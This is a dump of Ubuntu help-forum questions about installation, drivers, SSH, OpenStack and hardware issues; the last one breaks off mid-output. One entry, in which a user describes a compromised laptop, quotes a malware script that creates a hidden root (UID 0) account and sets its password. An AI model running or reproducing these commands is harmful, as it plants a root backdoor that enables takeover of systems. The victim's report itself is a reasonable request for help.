440899	ubuntu 13.10 can not detect any partition	recently i want to try out ubuntu 13.10 by using a live usb stick , but unfortunately i find that the installer can not detect any partition on my harddrive ; however , when i click `` try ubuntu '' and successfully goes to the desktop environment i find that i can access all of my partitions normally , so i do n't know what to do next . much appreciated for the help ! following is the output after using fdisk -l command : disk /dev/sda : 750.2 gb , 750156374016 bytes 255 heads , 63 sectors/track , 91201 cylinders , total 1465149168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0xe8ab35d1 device boot start end blocks id system /dev/sda1 * 2048 409599 203776 7 hpfs/ntfs/exfat /dev/sda2 409600 210139135 104864768 7 hpfs/ntfs/exfat /dev/sda3 1408555008 1456826367 24135680 7 hpfs/ntfs/exfat /dev/sda4 314996736 1465145343 575074304 f w95 ext 'd ( lba ) /dev/sda5 314998784 734429183 209715200 7 hpfs/ntfs/exfat /dev/sda6 734431232 1363576831 314572800 7 hpfs/ntfs/exfat /dev/sda7 1363578880 1408555007 22488064 7 hpfs/ntfs/exfat /dev/sda8 1456828416 1465145343 4158464 b w95 fat32 partition table entries are not in disk order disk /dev/sdb : 7933 mb , 7933526016 bytes 68 heads , 4 sectors/track , 56967 cylinders , total 15495168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xc3072e18 device boot start end blocks id system /dev/sdb1 * 8064 15495167 7743552 c w95 fat32 ( lba )
440904	qml listview overwriten with buttons - but should be in different rows	in below code i have 2 rows . in first i have buttons and in second a listview . why are they overwriten in the display , what 's wrong ? import qtquick 2.0 import ubuntu.components 0.1 page { id : test column { spacing : units.gu ( 1 ) id : pagelayout anchors { margins : units.gu ( 2 ) fill : parent } row { spacing : units.gu ( 1 ) button { objectname : `` button1 '' color : `` white '' text : i18n.tr ( `` help '' ) } button { objectname : `` button2 '' color : `` black '' text : i18n.tr ( `` search '' ) } } row { id : listarea spacing : units.gu ( 1 ) anchors.fill : parent listmodel { id : fruitmodel listelement { name : `` apple '' cost : 2.45 } listelement { name : `` orange '' cost : 3.25 } listelement { name : `` banana '' cost : 1.95 } } listview { anchors.fill : parent model : fruitmodel delegate : row { text { text : `` fruit : `` + name } text { text : `` cost : $ '' + cost } } } } } }
440906	about removing repos	is it safe to remove unselected repos ? is it safe to disable universe repo ? or does ubuntu use it ? cause apt-get update takes long time . is it safe to remove duplicate repos ? like spotify ?
440908	is it possible to install ( ubuntu 12.04 lts ) via a usb stick ?	i 'm totally new to ubuntu . downloaded iso image but it is too large to be burnt on a regular cd and dvd did not work . is it possible to download `` ubuntu 12.04 lts '' and boot from a usb stick ? and , how ? grateful for directions . / thanks got the direction needed . hope i will understand . just to clearify . i do n't want a bootable stick . i want to erase windows and install only ubuntu./ thanks
440910	java install shows amd64 on my intel i5 machine ?	i 'm installing the open jdk which came with my ubuntu 12.04 . i keep seeing references to directory `` java-6-openjdk-amd64 '' . this is running on my i5 intel machine . why is it mentioning amd ? system monitor acknowledges the processor is an intel core i5-2500k .
440911	virtual box 4.3 error not support 64 bit ?	i 'm using oracle virtual box 4.3.10 ( 64bit ) and ubuntu 12.04 64bit ut in the vm it only shows 32 bit versions.how can i fix this ? i have tried some options but failed . please help me out
440914	live dvd disc not being installed dvd drive reading disc in windows	i downloaded the installation dvd per the instructions however when i load it , all i get is a blank screen with a cursor and does nothing else . i 've tried everything i 've seen on the forums and google . my boot menu is set to cd/dvd drive first , but nothing happens . i 've tried f12 , toggling up and down arrows , c +f12 , etc . when i view the dvd in windows , it shows all the file listed , so i assume it should work . i 'm working on a panasonic toughbook cf-73 with an intel centrino processor , 1gb ram and 60gb hard drive with 40 % free space . any help would be greatly appreciated .
440915	drivers for ubuntu 12.04 : )	how i need to install driver ( admtek an983 ethernet adapter ) into linux ? i have those driver ( not .exe but .cab or something like that ) files , but where i need to put them ? thank you in advance .
440916	command `` service nova-compute start '' and the errors	while following the document to configure nova-compute , i got the error below . command : service nova-compute start message ( nova-compute.log ) : 2014-03-29 17:59:53.817 2908 info nova.openstack.common.periodic_task [ - ] skipping periodic task _periodic_update_dns because its interval is negative 2014-03-29 17:59:53.850 2908 info nova.virt.driver [ - ] loading compute driver 'libvirt.libvirtdriver' 2014-03-29 17:59:53.872 2908 info oslo.messaging._drivers.impl_rabbit [ - ] connected to amqp server on controller:5672 2014-03-29 17:59:53.883 2908 info oslo.messaging._drivers.impl_rabbit [ - ] connected to amqp server on controller:5672 2014-03-29 17:59:53.907 2908 audit nova.service [ - ] starting compute node ( version 2014.1-b3 ) 2014-03-29 17:59:53.932 2908 warning nova.virt.libvirt.driver [ req-8d1e2376-5890-4f44-8d73-c427b0dbad30 none none ] can not update service status on host : compute1 , since it is not registered . 2014-03-29 17:59:53.933 2908 warning nova.virt.libvirt.driver [ - ] uri qemu : ///system does not support events : internal error : could not initialize domain event timer 2014-03-29 17:59:53.945 2908 error nova.openstack.common.threadgroup [ - ] internal error : cpu feature `tsc-deadline ' specified more than once 2014-03-29 17:59:53.945 2908 trace nova.openstack.common.threadgroup traceback ( most recent call last ) : 2014-03-29 17:59:53.945 2908 trace nova.openstack.common.threadgroup file `` /usr/lib/python2.7/dist-packages/nova/openstack/common/threadgroup.py '' , line 117 , in wait 2014-03-29 17:59:53.945 2908 trace nova.openstack.common.threadgroup x.wait ( ) 2014-03-29 17:59:53.945 2908 trace nova.openstack.common.threadgroup file `` /usr/lib/python2.7/dist-packages/nova/openstack/common/threadgroup.py '' , line 49 , in wait 2014-03-29 17:59:53.945 2908 trace nova.openstack.common.threadgroup return self.thread.wait ( ) 2014-03-29 17:59:53.945 2908 trace nova.openstack.common.threadgroup file `` /usr/lib/python2.7/dist-packages/eventlet/greenthread.py '' , line 168 , in wait 2014-03-29 17:59:53.945 2908 trace nova.openstack.common.threadgroup return self._exit_event.wait ( ) 2014-03-29 17:59:53.945 2908 trace nova.openstack.common.threadgroup file `` /usr/lib/python2.7/dist-packages/eventlet/event.py '' , line 116 , in wait 2014-03-29 17:59:53.945 2908 trace nova.openstack.common.threadgroup return hubs.get_hub ( ) .switch ( ) 2014-03-29 17:59:53.945 2908 trace nova.openstack.common.threadgroup file `` /usr/lib/python2.7/dist-packages/eventlet/hubs/hub.py '' , line 187 , in switch 2014-03-29 17:59:53.945 2908 trace nova.openstack.common.threadgroup return self.greenlet.switch ( ) 2014-03-29 17:59:53.945 2908 trace nova.openstack.common.threadgroup file `` /usr/lib/python2.7/dist-packages/eventlet/greenthread.py '' , line 194 , in main 2014-03-29 17:59:53.945 2908 trace nova.openstack.common.threadgroup result = function ( *args , **kwargs ) 2014-03-29 17:59:53.945 2908 trace nova.openstack.common.threadgroup file `` /usr/lib/python2.7/dist-packages/nova/openstack/common/service.py '' , line 480 , in run_service 2014-03-29 17:59:53.945 2908 trace nova.openstack.common.threadgroup service.start ( ) 2014-03-29 17:59:53.945 2908 trace nova.openstack.common.threadgroup file `` /usr/lib/python2.7/dist-packages/nova/service.py '' , line 180 , in start 2014-03-29 17:59:53.945 2908 trace nova.openstack.common.threadgroup self.manager.init_host ( ) 2014-03-29 17:59:53.945 2908 trace nova.openstack.common.threadgroup file `` /usr/lib/python2.7/dist-packages/nova/compute/manager.py '' , line 810 , in init_host 2014-03-29 17:59:53.945 2908 trace nova.openstack.common.threadgroup self.driver.init_host ( host=self.host ) 2014-03-29 17:59:53.945 2908 trace nova.openstack.common.threadgroup file `` /usr/lib/python2.7/dist-packages/nova/virt/libvirt/driver.py '' , line 630 , in init_host 2014-03-29 17:59:53.945 2908 trace nova.openstack.common.threadgroup self._do_quality_warnings ( ) 2014-03-29 17:59:53.945 2908 trace nova.openstack.common.threadgroup file `` /usr/lib/python2.7/dist-packages/nova/virt/libvirt/driver.py '' , line 618 , in _do_quality_warnings 2014-03-29 17:59:53.945 2908 trace nova.openstack.common.threadgroup caps = self.get_host_capabilities ( ) 2014-03-29 17:59:53.945 2908 trace nova.openstack.common.threadgroup file `` /usr/lib/python2.7/dist-packages/nova/virt/libvirt/driver.py '' , line 2813 , in get_host_capabilities 2014-03-29 17:59:53.945 2908 trace nova.openstack.common.threadgroup libvirt.vir_connect_baseline_cpu_expand_features ) 2014-03-29 17:59:53.945 2908 trace nova.openstack.common.threadgroup file `` /usr/lib/python2.7/dist-packages/eventlet/tpool.py '' , line 179 , in doit 2014-03-29 17:59:53.945 2908 trace nova.openstack.common.threadgroup result = proxy_call ( self._autowrap , f , *args , **kwargs ) 2014-03-29 17:59:53.945 2908 trace nova.openstack.common.threadgroup file `` /usr/lib/python2.7/dist-packages/eventlet/tpool.py '' , line 139 , in proxy_call 2014-03-29 17:59:53.945 2908 trace nova.openstack.common.threadgroup rv = execute ( f , *args , **kwargs ) 2014-03-29 17:59:53.945 2908 trace nova.openstack.common.threadgroup file `` /usr/lib/python2.7/dist-packages/eventlet/tpool.py '' , line 77 , in tworker 2014-03-29 17:59:53.945 2908 trace nova.openstack.common.threadgroup rv = meth ( *args , **kwargs ) 2014-03-29 17:59:53.945 2908 trace nova.openstack.common.threadgroup file `` /usr/lib/python2.7/dist-packages/libvirt.py '' , line 3127 , in baselinecpu 2014-03-29 17:59:53.945 2908 trace nova.openstack.common.threadgroup if ret is none : raise libvirterror ( 'virconnectbaselinecpu ( ) failed ' , conn=self ) 2014-03-29 17:59:53.945 2908 trace nova.openstack.common.threadgroup libvirterror : internal error : cpu feature `tsc-deadline ' specified more than once 2014-03-29 17:59:53.945 2908 trace nova.openstack.common.threadgroup test env : vmware fusion os-ubuntu 12.04 lts ( 64-bit ) root @ compute1 : /etc/nova # uname -a linux compute1 3.5.0-47-generic # 71~precise1-ubuntu smp wed feb 19 22:02:52 utc 2014 x86_64 x86_64 x86_64 gnu/linux root @ compute1 : /etc/nova # kvm-ok info : /dev/kvm exists kvm acceleration can be used anybody who know and solve this issues ? thanks in advance .
440917	screen sharing a single application	i 'm curious if there is a way to share a single application window with another machine without sharing my entire desktop ? perhaps there is some way to virtually create a new display and place my application in there and share this over vnc or rdp . i have n't be able to find any existing solutions to this problem and am happy to hack around to come up with something . any ideas ?
440919	how to deal with malware on my laptop ?	i am fairly certain that my ubuntu 13.10 laptop is infected with some sort of malware . every once in a while , i find a process /lib/sshd ( owned by root ) running and consuming lots of cpu . it is not the sshd server which runs /usr/sbin/sshd . the binary has -- wxrw-rwt permissions and it generates and spawns scripts in the /lib directory . a recent one is named 13959730401387633604 and it does the following # ! /bin/sh exec 1 > /dev/null exec 2 > /dev/null useradd -g 0 -u 0 -o gusr echo gusr : chaonimabi123456123 | chpasswd the gusr user was created by the malware independently , and then the chpasswd hangs while consuming 100 % cpu . so far , i 've identified that the gusr user was additionally added to files in /etc/ /etc/group /etc/gshadow /etc/passwd /etc/shadow /etc/subgid /etc/subuid it seems like the malware made copies of all these files with the `` - '' suffix . the full list of /etc/ files that were modified by root is available here . in addition , the /etc/hosts file was changed to the this . the /lib/sshd starts by adding itself to the end of /etc/init.d/rc.local file ! i 've removed the user , removed the files , killed the tree of processed , changed my passwors and removed the ssh public keys . i am aware that i am basically screwed , and i will most likely reinstall the whole system . nevertheless , since i login to several other machines , it would be good to at least attempt to remove it , and figure out how i got it . any suggestions on how to go about this would be appreciated . it seems like they got in on march 25 by brute-forcing root login . i had no idea that root ssh is enabled by default in ubuntu . i disabled it and put up denyhosts . the login was from 59.188.247.236 , somewhere in hong kong apparently . i got the laptop from emperorlinux , and they enabled root access . if you have one of those and you 're running sshd beware .
440921	my canon mf4700 series ufriilt	i have a new computer and my canon will not load , says drivers are not installed , can not find a way to make this work . i have downloaded the drivers from the canon website , to no avail . i have also tried having the computer find it by itself . nothing seems to work . unfortunately i can not find the disk that that the printer came with .
440923	i need a rdp client that could run ito a windows server 2012	i need a rdp client that could run ito a windows server 2012 . not working with remmina remote desktop client and the program 2xclient dont even wana run o.o im with ubunutu 13.10 .
440926	installs keep reporting no space on device	thanks in advance for your help ! i 'm new to ubuntu , and i 'm sure my questions are pretty basic . i 'm trying to install java and eclipse on my ubuntu 12.04 machine . i 'm using the command : sudo apt-get install eclipse-platform right after the output line : update-initramfs : generating /boot/initrd.img-3.8.0-37-generic i see this : gzip : stdout : no space left on device do i need to make gzip use a disk other that /boot ? how do i go about doing that ?
440928	permission denied ( publickey , password ) when connecting to computers with lan	i have two computers in my local network behind my belkin router in my home . both are running ubuntu 12.04 . i want to use secure copy to transfer a file from one computer to the other . unfortunately , i am met with the error : permission denied , please try again . permission denied , please try again . permission denied ( publickey , password ) . lost connection i have taken the following steps : // one computer has a local ip address of 192.168.2.12 . ( let 's call it the client ) . myuser @ teammyuser : ~ $ ifconfig eth0 link encap : ethernet hwaddr 00:1b : fc:64 : ea : ed inet addr:192.168.2.12 bcast:192.168.2.255 mask:255.255.255.0 inet6 addr : fe80 : :21b : fcff : fe64 : eaed/64 scope : link // let 's install ssh on it : sudo apt-get install openssh-server myuser @ teammyuser : ~ $ apt-cache policy openssh-server openssh-server : installed : 1:5.9p1-5ubuntu1.2 candidate : 1:5.9p1-5ubuntu1.2 myuser @ teammyuser : ~ $ sudo netstat -tulpn | grep sshd tcp 0 0 0.0.0.0:22 0.0.0.0 : * listen 920/sshd tcp6 0 0 : ::22 : : : * listen 920/sshd myuser @ teammyuser : ~ $ ps aux | grep sshd root 920 0.0 0.0 6684 2424 ? ss 19:17 0:00 /usr/sbin/sshd - // another computer has a local ip address of 192.168.2.6 . ( let 's call it the server ) . teammyuser @ teammyuser : ~ $ ifconfig eth0 link encap : ethernet hwaddr 00:24 : e8 : da:84:25 inet addr:192.168.2.6 bcast:192.168.2.255 mask:255.255.255.0 inet6 addr : fe80 : :224 : e8ff : feda:8425/64 scope : link // i install ssh on this machine as well : sudo apt-get install openssh-server // on client machine ( 192.168.2.12 ) , i make the server machine ( 192.168.2.6 ) a known host : myuser @ teammyuser : ~/.ssh $ ssh-keyscan 192.168.2.6 | tee -a ~/.ssh/known_hosts // on server machine ( 192.168.2.6 ) , i ensure password authentication is enabled so the client machine can access the server machine : teammyuser @ teammyuser : ~/.ssh $ cat /etc/ssh/sshd_config | grep -b1 -a1 'passwordauthentication' # change to no to disable tunnelled clear text passwords # passwordauthentication yes // i am able to ssh into server machine : myuser @ teammyuser : ~ $ ssh teammyuser @ 192.168.2.6 teammyuser @ 192.168.2.6 's password : welcome to ubuntu 12.04.3 lts ( gnu/linux 3.5.0-44-generic i686 ) * documentation : https : //help.ubuntu.com/ last login : sat mar 29 21:50:26 2014 from teammyuser.local // i confirm other user has read and write permission to the somedir directory on server machine ( 192.168.2.6 ) : teammyuser @ teammyuser : ~/downloads $ ls -l | grep somedir drwxrwxrwx 2 teammyuser teammyuser 4096 mar 29 20:26 somedir // but when i try to actually move a file into somedir , i get permission denied : myuser @ teammyuser : ~ $ scp myuser @ 192.168.2.12 : somefile teammyuser @ 192.168.2.6 : /home/myuser/downloads/somedir myuser @ 192.168.2.12 's password : permission denied , please try again . permission denied , please try again . permission denied ( publickey , password ) . lost connection what might i be doing wrong ?
440933	how do i fix x problem to invoke cadence ic6.10 in ubuntu 13.10	i installed cadence ic6.10 in my ubuntu 13.10 . when i tried to invoke the cadence , i got the following error message : ============================================================= qt warning : x error : badmatch ( invalid parameter attributes ) 8 extension : 139 ( render ) minor opcode : 4 ( rendercreatepicture ) resource id : 0x26 ... ... ... . ... ... ... ============================================================= i searched around and got an advice that i could add the following strings to /etc/x11/xorg.conf ============================================================ section `` extensions '' option `` composite '' `` disable '' endsection ============================================================ however , after i added these strings and rebooted ubuntu , it was always stuck in boot screen . if i changed `` disable '' as `` enable '' , i could reboot it successfully . but i was still not able to invoke cadence . it still showed the same error message . could anyone tell me a right solution to fix this error so i could invoke cadence successfully ?
440934	business software	i read that ubuntu linux will work `` right out of the box '' as an operating system for business software , accounts payable , accounts receivable , inventory control , etc . i use business vision , and am considering quick books , but both say the requirement is a version of windows . so what business solutions are available to use with ubuntu ?
440940	how can i restore boot access to windows 8 after ubuntu 13.10 ?	i never thought i would end up here after having dealt with windows and ubuntu and dual booting and grub and burg ( because it 's pretty ) in the past year . but right now i am completely baffled . so what happened was , quite some time ago i had installed windows 8 on a system that already had ubuntu on it . i knew it was easy to restore access to ubuntu by installing grub from a live usb stick afterwards . thing is , i simply stuck to windows for a long time . after a while i remembered 60 gb of my hard drive were unused an unaccesible so i just booted up a live usb stick with ubuntu and installed grub so i could access both win 8 and ubuntu but then i thought i should do a fresh install of the latest ubuntu 13.10 so i did . problem is ... now that that 's done , no matter how many times i tried installing grub or using a boot-repair i just can not get into windows anymore . i tried booting the ububntu live usb and when i look into gparted all i can see is two small partitions /dev/sda1 and /dev/sda2 and a huge one /dev/sda3 with an exclamation mark on it and a file system named crypt-luks . now what i am thinking is the whole hard drive is somehow encrypted now and messing with my boot manager . also , i should add , from bios i have 3 pathways i can boot from , two of which are identical ( something with ubuntu in their names ) and a microsoft one but it does n't work . i apologize if this is a bit unclear , it 's quite late here and i 'm so tired from trying to fix this .
440941	export list of duplicate images on digikam/findimagedupes/fsplint/geeqie	i have 60000 images . and when i ask any of the following tools to come up with similar photos , all of them pop out a big list of around 3000 names of images . digikam gives a cool ui which lets me see which images are similar and in which folders they are . but is there anyway to create a csv out of this , where i can list for every image , what are the duplicates and in which folder it is ? can som script do this ? please let me know . thanks ! : ) the tools i used are these : digikam findimagedupes fsplint geeqie
440945	how to adjust brightness vaio nr21s ubuntu 13.10 ?	i installed ubuntu 13.10 on my vaio nr21s but can not adjust brightness levels . the fn keys work , but they do n't change a thing , brightness remains at max level . thought i should choose a repository nvidia driver , but i believe it makes it worse , because the screens during boot are all messed up . so i got back to the nouveau . video card is nvidia 8400m gt gpu . i know that there are plenty of threads stating the same issues , but none of the suggested solutions worked out for me .
440946	how to install java plugin for firefox in ubuntu ?	i want to download youtube videos , so i use the website keepvid.com but it requires java plugin . i installed java through terminal but it 's not giving any fruit . so please help me in step by step or suggest another website or software which can easly download youtube videos . thank you .
440951	custom ubuntu distro - remastersys - no set settings	i am trying to create my own custom distro from ubuntu 12.04 after watching a video on youtube . my problem is when i boot my liveusb it looks exactly like a normal boot of ubuntu 12.04 other than the cursor i changed . but i found that if i went into tweak tool ( this is logged into gnome environment ) almost all my settings were there , just not set . my icon pack was there but not selected by default , my extensions were there - just none were on and things like the trash bin on the desktop were all off . so basically , i am trying to find a way to make my live edition default exactly like what i am using just without all my personal data .
440953	lenovo y560 overheated	currently using ubuntu 13.10 via wubi with windows 8.1 dual-boot . problem arises when i use ubuntu it gets overheated due to which the laptop is discharged very quickly and sometimes stops due to over heating . running on core i7 processor on lenovo y560 laptop with amd radeon graphics .
440955	viewing mobile broadband details from ubuntu	i am using mobile braodband on my ubuntu setup . is it possible to view the connection details like , phone number of the sim card , data usage details from network manager or via any other linux command ?
440956	13.10 to 12.04 easy wayi	how does one switch from ubuntu 13.10 to ubuntu 12.04 ? i bought a laptop that came with ubuntu 13.10 as the native os . i used a friends system with 12.04 and have decided that i want it .
440957	`` could not resolve hostname '' error installing softwares	can download packages from browser by copying the urls below.. w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/saucy-backports/release.gpg could not resolve 'hostname' w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/saucy-security/release.gpg could not resolve 'hostname'
440958	is there any way to set the display scaling back to default other than from the display settings dialog ?	i scaled the ui from the display menu . now it is way too big and i ca n't get to the slider to reset it . any ideas how i can change the scaling in unity back to default without accessing the settings menu ? ? i tried dconf reset -f /org/unity with no luck .
440959	i have ubuntu on my flash drive but it will not boot when i start my pc	i have ubuntu 13.10 64-bit on my flash drive , and it is not detected by my pc 's bios . can anyone help ? i really want to get ubuntu back . ( i recently deleted its partition and reset windows 7 's boot manager , and when i have the usb set as primary , it just goes straight to the windows login screen . system info : ⠀os : windows 7 ultimate 64-bit , service pack one ( trying to dual boot with ubuntu ) ⠀ram : 4 gb ⠀processor : intel pentium cpu b980 @ 2.40ghz 2.40 ghz ⠀gpu : intel hd graphics ⠀dvd/cd-rom ( driver ) : tsstcorp cddvdw sn-208ab ata device ⠀i have the intel chipset ⠀model : toshiba satellite : c855-s5349 i almost prefer ubuntu over windows ( speed-wise ) . let me know if you need any more information . can you please help me with this issue ? thanks in advance !
440960	i want to use ubuntu , but i have some issues with hardware peripherals	i 'm really interested in ubuntu , but i 've always run into a constant blockade that prevents me from moving forward ; lack of driver support for the devices i use . below is my current mouse and headset , and the keyboard and new mouse i plan on eventually getting . currently , i have a logitech g35 headset and a logitech m510 mouse . i also plan on getting a corsair k95 keyboard , and a steelseries sensei mouse . my main problem at the moment is that logitech does n't support linux . the mouse works fine without setpoint , it 's configuration software , but offers advanced features . a replacement program for it or a way to get setpoint working on linux would be appreciated , but not required . as for the g35 headset , it makes use of the logitech gaming software , which provides surround sound and extra features . i honestly do n't need the extra feature , but it 's appreciated . however , once i buy the keyboard and new mouse , replacement programs or versions that work on linux are necessary due to the features . so , to sum it up , my main problem is lack of driver support for my current devices , and in want to know if there 's software i can use to fix my predicament that i might have missed when i looked . alternatively , how many of these can i successfully run on wine and get the expected function ? i already asked this question on reddit , and got one answer and a prompt to ask here , so i 'm asking just in case they missed anything .
440961	change default downloader in firefox or chromium	i want to download all types of file with firefox or chromium web browser directly with a downloader without copying and pasting the link .
440962	how do you launch system applications from within a ubuntu touch app ?	android had a concept of intents by which you can launch the system apps using your own apps . does ubuntu touch have any options like that ? if so how can one do it ?
440963	i have problems with my pendrive	one of my friends recently gave me some videos with a pendrive . when i opened the pendrive there was only a few shortcuts but the pendrives property shows that it had 14 gb . just like my friend gave it to me how do i fix this problem
440964	how well does the gtx 780 perform on ubuntu ?	i looked at the related questions and found a few pertaining to the drivers for the 780 not working correctly , but i assume those are isolated cases . anyhow , i 'm a gamer , and i have my computer that i 'm going to eventually build set out and ready to be bought when i have the money for it . currently , i 'm planning on buying an asus gtx 780 card . i know i can run this just fine on windows , but how is the gtx 780 's performance in ubuntu compared to windows ? will i have any issues setting up the card from a manufacturer like asus ?
440965	installing unity-greeter on 13.10	while installing unity-greeter-14.04.6 from launchpad.. when run ./configure it shows some error and does not produce makefile configure : error : package requirements ( gtk+-3.0 gdk-x11-3.0 indicator3-0.4 libido3-0.1 > = 13.10.0 liblightdm-gobject-1 > = 1.4.0 freetype2 cairo-ft libcanberra pixman-1 x11 were not met : no package 'indicator3-0.4 ' found no package 'libido3-0.1 ' found no package 'liblightdm-gobject-1 ' found no package 'libcanberra ' found ) any suggestion ?
440966	dell inspiron n5010 bluetooth does n't work	i have problem with bluetooth on my laptop . i will be grateful for any advice . cat /etc/lsb-release ; uname -a distrib_id=ubuntu distrib_release=13.10 distrib_codename=saucy distrib_description= '' ubuntu 13.10 '' linux ivopc 3.11.0-18-generic # 32-ubuntu smp tue feb 18 21:11:14 utc 2014 x86_64 x86_64 x86_64 gnu/linux lsusb bus 002 device 006 : id 413c:8162 dell computer corp . integrated touchpad [ synaptics ] bus 002 device 005 : id 413c:8161 dell computer corp . integrated keyboard bus 002 device 004 : id 0a5c:4500 broadcom corp. bcm2046b1 usb 2.0 hub ( part of bcm2046 bluetooth ) bus 002 device 003 : id 0bda:0159 realtek semiconductor corp. rts5159 card reader controller bus 002 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 004 : id 0c45:641d microdia 1.3 mpixel integrated webcam bus 001 device 003 : id 046d : c019 logitech , inc. optical tilt wheel mouse bus 001 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub rfkill list all 0 : phy0 : wireless lan soft blocked : no hard blocked : no 1 : brcmwl-0 : wireless lan soft blocked : no hard blocked : no lspci -vv 00:00.0 host bridge : intel corporation core processor dram controller ( rev 18 ) subsystem : dell device 0447 control : i/o- mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b+ parerr- devsel=fast > tabort- < tabort- < mabort+ > serr- < perr- intx- latency : 0 capabilities : < access denied > 00:01.0 pci bridge : intel corporation core processor pci express x16 root port ( rev 18 ) ( prog-if 00 [ normal decode ] ) control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx+ status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 , cache line size : 64 bytes bus : primary=00 , secondary=01 , subordinate=01 , sec-latency=0 i/o behind bridge : 0000e000-0000efff memory behind bridge : fbe00000-fbefffff prefetchable memory behind bridge : 00000000c0000000-00000000cfffffff secondary status : 66mhz- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- < serr- < perr- bridgectl : parity- serr- noisa- vga+ mabort- > reset- fastb2b- pridisctmr- secdisctmr- disctmrstat- disctmrserren- capabilities : < access denied > kernel driver in use : pcieport 00:16.0 communication controller : intel corporation 5 series/3400 series chipset heci controller ( rev 06 ) subsystem : dell device 0447 control : i/o- mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx+ status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 interrupt : pin a routed to irq 47 region 0 : memory at fbf09000 ( 64-bit , non-prefetchable ) [ size=16 ] capabilities : < access denied > kernel driver in use : mei_me 00:1a.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 06 ) ( prog-if 20 [ ehci ] ) subsystem : dell device 0447 control : i/o- mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b+ parerr- devsel=medium > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 interrupt : pin a routed to irq 16 region 0 : memory at fbf08000 ( 32-bit , non-prefetchable ) [ size=1k ] capabilities : < access denied > kernel driver in use : ehci-pci 00:1b.0 audio device : intel corporation 5 series/3400 series chipset high definition audio ( rev 06 ) subsystem : dell device 0447 control : i/o- mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx+ status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 , cache line size : 64 bytes interrupt : pin a routed to irq 48 region 0 : memory at fbf00000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : snd_hda_intel 00:1c.0 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 1 ( rev 06 ) ( prog-if 00 [ normal decode ] ) control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx+ status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 , cache line size : 64 bytes bus : primary=00 , secondary=11 , subordinate=11 , sec-latency=0 i/o behind bridge : 00002000-00002fff memory behind bridge : d1600000-d17fffff prefetchable memory behind bridge : 00000000d1800000-00000000d19fffff secondary status : 66mhz- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- < serr- < perr- bridgectl : parity- serr- noisa- vga- mabort- > reset- fastb2b- pridisctmr- secdisctmr- disctmrstat- disctmrserren- capabilities : < access denied > kernel driver in use : pcieport 00:1c.1 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 2 ( rev 06 ) ( prog-if 00 [ normal decode ] ) control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx+ status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 , cache line size : 64 bytes bus : primary=00 , secondary=12 , subordinate=12 , sec-latency=0 i/o behind bridge : 00003000-00003fff memory behind bridge : fbd00000-fbdfffff prefetchable memory behind bridge : 00000000d1a00000-00000000d1bfffff secondary status : 66mhz- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- < serr- < perr- bridgectl : parity- serr- noisa- vga- mabort- > reset- fastb2b- pridisctmr- secdisctmr- disctmrstat- disctmrserren- capabilities : < access denied > kernel driver in use : pcieport 00:1c.2 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 3 ( rev 06 ) ( prog-if 00 [ normal decode ] ) control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx+ status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 , cache line size : 64 bytes bus : primary=00 , secondary=13 , subordinate=13 , sec-latency=0 i/o behind bridge : 0000d000-0000dfff memory behind bridge : fb300000-fbcfffff prefetchable memory behind bridge : 00000000d0c00000-00000000d15fffff secondary status : 66mhz- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- < serr- < perr- bridgectl : parity- serr- noisa- vga- mabort- > reset- fastb2b- pridisctmr- secdisctmr- disctmrstat- disctmrserren- capabilities : < access denied > kernel driver in use : pcieport 00:1c.4 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 5 ( rev 06 ) ( prog-if 00 [ normal decode ] ) control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx+ status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 , cache line size : 64 bytes bus : primary=00 , secondary=15 , subordinate=15 , sec-latency=0 i/o behind bridge : 0000c000-0000cfff memory behind bridge : fa900000-fb2fffff prefetchable memory behind bridge : 